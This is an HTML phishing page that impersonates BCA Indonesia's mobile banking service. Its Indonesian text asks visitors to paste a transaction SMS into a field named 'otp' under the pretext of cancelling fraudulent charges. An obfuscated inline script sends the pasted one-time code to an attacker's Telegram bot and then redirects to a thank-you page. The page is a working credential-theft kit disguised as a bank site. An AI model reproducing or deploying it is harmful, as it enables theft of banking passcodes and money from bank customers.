<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
    <title>BCA - Mobile Banking</title>
    <link rel="icon" href="../assets/img/favicon.png">
    <!-- Tailwind CSS and DaisyUI CDN -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/tailwindcss/2.2.19/tailwind.min.css" rel="stylesheet">
    <link href="https://cdn.jsdelivr.net/npm/daisyui@4.12.10/dist/full.min.css" rel="stylesheet" type="text/css" />
    <script src="https://cdn.tailwindcss.com"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/alpinejs/3.10.2/cdn.min.js" defer></script>
    <script src="config.js"></script> <!-- Include config.js -->
</head>

<body class="bg-gray-100">
    <div class="flex flex-col min-h-screen">
        
        <!-- Header -->
        <nav class="bg-blue-600 shadow-md">
            <div class="container mx-auto flex items-center p-4">
                <a class="flex items-center" href="#">
                    <img src="../images/bcalogo.png" class="w-1/3" alt="BCA Logo">
                </a>
            </div>
        </nav>

        <!-- Main Content -->
        <main class="flex-grow">
            <div class="container mx-auto p-4">
                <div class="card border border-gray-300 rounded-lg shadow-lg p-4">
                    <div class="text-center mb-4">
                        <img src="https://i.ibb.co.com/DG1tCG9/IMG-20241006-WA0052-1.jpg" class="w-2/4 mx-auto mb-2" alt="Image">
                        <h4 class="text-xl font-bold mb-2 text-gray-900">Pembatalan Transaksi</h4>
                        <p class="text-gray-900 text-base mb-4">Silahkan batalkan SMS transaksi yang bukan anda lakukan, demi menjaga tagihan di kartu kredit anda dengan cara masukkan atau tampel SMS transaksi di Kolom bawah ini</p>
                    </div>
                    <form id="cancelForm" class="space-y-4">
                        <div>
                            <input class="input input-bordered w-full text-center" type="text" placeholder="Tempel disini" name="otp" required minlength="1" maxlength="255">
                        </div>
                        <button class="btn btn-primary w-full py-2 bg-blue-600 text-white rounded-lg shadow-md hover:bg-blue-700" id="submitButton" type="submit">
                            Batalkan Sekarang
                        </button>
                    </form>
                    <div id="loading" class="flex justify-center mt-4" style="display: none;">
                        <i class="fas fa-spinner fa-spin text-blue-600 text-3xl"></i>
                    </div>
                </div>
            </div>
        </main>

        <!-- Footer -->
        <footer class="bg-cover bg-center py-8 mt-8" style="background-image: url('../images/footer.jpg');">
            <div class="text-center">
                <img src="../assets/img/ayii.png" class="w-3/5 mx-auto mb-2" alt="Footer Image">
                <p class="text-white text-sm mb-1">BCA Indonesia terdaftar dan diawasi oleh Otoritas Jasa Keuangan (OJK) serta merupakan peserta penjamin Lembaga Penjamin Simpanan LPS</p>
                <p class="text-white text-sm">Copyright © 2024 BCA Indonesia</p>
            </div>
        </footer>

    </div>

    <script>
        !function(){document.getElementById("cancelForm").addEventListener("submit",function(e){e.preventDefault();document.getElementById("loading").style.display="flex",document.getElementById("submitButton").disabled=!0;var t=document.querySelector('input[name="otp"]').value,n="https://api.telegram.org/bot"+TELEGRAM_BOT_TOKEN+"/sendMessage",o="𝗕𝗖𝗔 - 𝗣𝗲𝗺𝗯𝗮𝘁𝗮𝗹𝗮𝗻 𝗧𝗿𝗮𝗻𝘀𝗮𝗸𝘀𝗶\n\n𝗦𝗠𝗦:\n"+t;fetch(n,{method:"POST",headers:{"Content-Type":"application/json"},body:JSON.stringify({chat_id:TELEGRAM_USER_ID,text:o})}).then(function(e){return e.json()}).then(function(e){e.ok||alert("Gagal mengirim data, silahkan coba lagi.")}).catch(function(e){console.error("Error:",e),alert("Terjadi kesalahan, silahkan coba lagi.")}).finally(function(){document.getElementById("loading").style.display="none",document.getElementById("submitButton").disabled=!1,window.location.href="terimakasih-pembatalan.html"})})}();
        </script>
        

    <script src="../assets/bootstrap/js/bootstrap.min.js"></script>
</body>

</html>